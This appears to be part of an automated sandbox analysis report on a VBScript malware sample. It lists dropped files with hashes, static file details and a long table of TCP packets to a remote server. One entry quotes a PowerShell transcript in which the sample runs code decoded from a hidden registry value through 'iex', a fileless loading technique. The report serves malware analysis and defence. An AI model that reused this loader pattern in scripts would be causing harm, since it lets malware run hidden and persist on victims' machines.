SHA-256:	D1C7689CD54334F98BFD15BFD71C9C1E8BDEA8AD9243F67F769771D113F1F8EA
SHA-512:	44336F22012607FE96E4F83ED4CE1EB946532203BDF6D57CF98F7608BCA2A8C30D275BBC4ED04DD378BE77615EC438AB77979A78675F82FBAA6F9341E601A3E8
Malicious:	false
Preview:	23-11-2020 12:20:16 \| "0xb88d3fdf_5fa2c4f12d12f" \| 1..

C:\Users\user\Documents\20201123\PowerShell_transcript.405464.YiUpPuBI.20201123121927.txt Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1189
Entropy (8bit):	5.318252879290044
Encrypted:	false
SSDEEP:	24:BxSA87vBZMex2DOXUWOLCHGIYBtLWCHjeTKKjX4CIym1ZJXiOLCHGIYBtZGnxSAf:BZavjMeoORF/CqDYB1ZAFHZZZ
MD5:	6AE60B6CC94E67330266DFB6210EFCFD
SHA1:	AA9B2E73DEAF83105D2FDD90317B6DA191747262
SHA-256:	2BCEAB5A8C9213B4653D609BDC137EF7B5CC98AEC54A032265A1DFF28B7D5A05
SHA-512:	2BADE15D8FF36CAB4D3873692CBE3F555A1B816C95DC8AA85BAEB49F5DF7969C1301AED5F7F84734F559132283C9DD3053E4AE87FC5D0562BD841157FAADFB23
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20201123121928..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 405464 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550).basebapi))..Process ID: 4604..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20201123121928..******************..PS>iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550).basebapi))..********************..

\Device\ConDrv Download File
Process:	C:\Windows\System32\nslookup.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	28
Entropy (8bit):	4.039148671903071
Encrypted:	false
SSDEEP:	3:U+6QlBxAN:U+7BW
MD5:	D796BA3AE0C072AA0E189083C7E8C308
SHA1:	ABB1B68758B9C2BF43018A4AEAE2F2E72B626482
SHA-256:	EF17537B7CAAB3B16493F11A099F3192D5DCD911C1E8DF0F68FE4AB6531FB43E
SHA-512:	BF497C5ACF74DE2446834E93900E92EC021FC03A7F1D3BF7453024266349CCE39C5193E64ACBBD41E3A037473A9DB6B2499540304EAD51E002EF3B747748BF36
Malicious:	false
Preview:	Non-authoritative answer:...

Static File Info

General
File type:	ASCII text, with very long lines, with CRLF, LF line terminators
Entropy (8bit):	5.264322263325788
TrID:
File name:	2Q4tLHa5wbO1.vbs
File size:	376718
MD5:	afa1319ab7c53ec14f6e2b5b403d4d08
SHA1:	1081298acf917fed6ed090c3d5ed642eef9e0f34
SHA256:	7eb2fa04c617f7c2adcfe5f2f6d0fef4dc20d89c30e06158ee1bcb94e5c128a2
SHA512:	796915943ea709ea0234911252b4eee6aa15a74709629f2749e397dc3cab70b11996714ab4b2d728d6d8931e83ef5a58b62938f6e62d02d254a5c71d1d4e93a0
SSDEEP:	6144:EkksIhqrBIWUpltI+iy2USFBqdNqpqximcH0d1gMGz:HrBz7
File Content Preview:	' kinky laundry Danbury wave revving caret Richard Muzo Erato oligoclase march corroboree took halfback Nevada biz octile caddis skyway bimetallic, Titan Tanganyika peccary downy, 1819897 flow escort, 1161344 ONeill bray banquet chenille ploy arteriolos

File Icon


Icon Hash:	e8d69ece869a9ec4

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 23, 2020 12:19:07.961834908 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:07.961854935 CET	49733	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:08.222829103 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:08.223010063 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:08.224163055 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:08.239618063 CET	80	49733	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:08.239754915 CET	49733	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:08.525428057 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.288871050 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.288896084 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.288908958 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.288919926 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.288933039 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.288944960 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.289078951 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:09.289136887 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:09.328711033 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.328738928 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.328756094 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.328778028 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.328866959 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:09.328929901 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:09.550035954 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.550065041 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.550081968 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.550097942 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.550115108 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.550132990 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.550154924 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.550175905 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.550188065 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.550194025 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:09.550199986 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.550223112 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.550245047 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.550252914 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:09.550263882 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:09.550271988 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:09.550276995 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:09.550312042 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:09.589838982 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.589890957 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.589927912 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.589961052 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.590002060 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.590055943 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:09.590111017 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:09.590125084 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:09.703165054 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.703186989 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.703342915 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:09.743204117 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.743437052 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:09.811219931 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.811278105 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.811316013 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.811347008 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.811383963 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.811430931 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.811444998 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:09.811475039 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.811486006 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:09.811515093 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.811518908 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:09.811554909 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.811558008 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:09.811582088 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:09.811593056 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.811621904 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:09.811630964 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.811661959 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:09.811671019 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.811709881 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.811733007 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:09.811760902 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.811767101 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:09.811798096 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.812103987 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:09.910643101 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.910705090 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.910756111 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.910809040 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.910837889 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:09.910852909 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.910880089 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:09.910887003 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:09.910892963 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.910912037 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:09.910934925 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.910973072 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.911006927 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:09.911010981 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.911046982 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:09.911086082 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:09.950620890 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.950691938 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.950737000 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.950777054 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.950814962 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.950851917 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.950851917 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:09.950889111 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.950892925 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:09.950927973 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:09.950928926 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.950983047 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:09.951006889 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:09.965806007 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:09.965900898 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:10.117736101 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.117820024 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.117825031 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:10.117870092 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.117882013 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:10.117908001 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.117928028 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:10.117949009 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.117955923 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:10.117989063 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.117994070 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:10.118036032 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:10.118036985 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.118079901 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.118081093 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:10.118118048 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.118128061 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:10.118161917 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:10.158178091 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.158236027 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.158272982 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.158298016 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:10.158310890 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.158334970 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:10.158349991 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.158365011 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:10.158389091 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.158405066 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:10.158427954 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.158440113 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:10.158466101 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.158476114 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:10.158516884 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.158519983 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:10.158569098 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:10.172132015 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.172399998 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:10.325139046 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.325195074 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.325229883 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.325264931 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:10.325273037 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.325308084 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:10.325313091 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.325314999 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:10.325320005 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:10.325347900 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.325376987 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:10.325392008 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:10.325404882 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.325453997 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.325469017 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:10.325489998 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.325505972 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:10.325525045 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.325548887 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:10.325591087 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:10.365533113 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.365588903 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.365619898 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.365658045 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.365695000 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.365721941 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:10.365732908 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.365751982 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:10.365756035 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:10.365771055 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.365801096 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:10.365808964 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:10.365813971 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.365869045 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:10.379184008 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.379364967 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:10.419534922 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.419601917 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.419717073 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:10.419780016 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:10.532331944 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.532392025 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.532430887 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.532469988 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.532500029 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:10.532506943 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.532547951 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:10.532553911 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:10.532555103 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.532558918 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:10.532563925 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:10.532598019 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.532613039 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:10.532635927 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.532660961 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:10.532674074 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.532689095 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:10.532713890 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.532725096 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:10.532771111 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:10.573115110 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.573174953 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.573214054 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.573235989 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:10.573254108 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.573272943 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:10.573278904 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:10.573292017 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.573299885 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:10.573332071 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.573348045 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:10.573373079 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.573398113 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:10.573421001 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:10.586724043 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.586977959 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:10.616780043 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.616837978 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.616890907 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.616925955 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:10.616980076 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:10.616986990 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:10.626827002 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.627038002 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:10.740683079 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.740742922 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.740791082 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:10.740803003 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.740843058 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:10.740849972 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:10.740855932 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.740905046 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.740910053 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:10.740959883 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.740959883 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:10.741009951 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.741013050 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:10.741056919 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.741060972 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:10.741105080 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.741112947 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:10.741153002 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.741189957 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:10.741236925 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:10.780651093 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.780704975 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.780761003 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.780806065 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.780827045 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:10.780857086 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.780870914 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:10.780878067 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:10.780881882 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:10.780913115 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.780916929 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:10.780962944 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.780978918 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:10.781023979 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:10.793682098 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.793773890 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:10.820533991 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.820636988 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:10.823606968 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.823648930 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.823700905 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:10.823721886 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:10.834249973 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.834358931 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:10.872385979 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.872499943 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:10.877928972 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.878025055 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:10.946778059 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.946835995 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.946892023 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.946949959 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.947004080 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.947009087 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:10.947051048 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.947052956 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:10.947058916 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:10.947063923 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:10.947098970 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.947123051 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:10.947149038 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.947160006 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:10.947208881 CET	49732	80	192.168.2.4	47.241.19.44
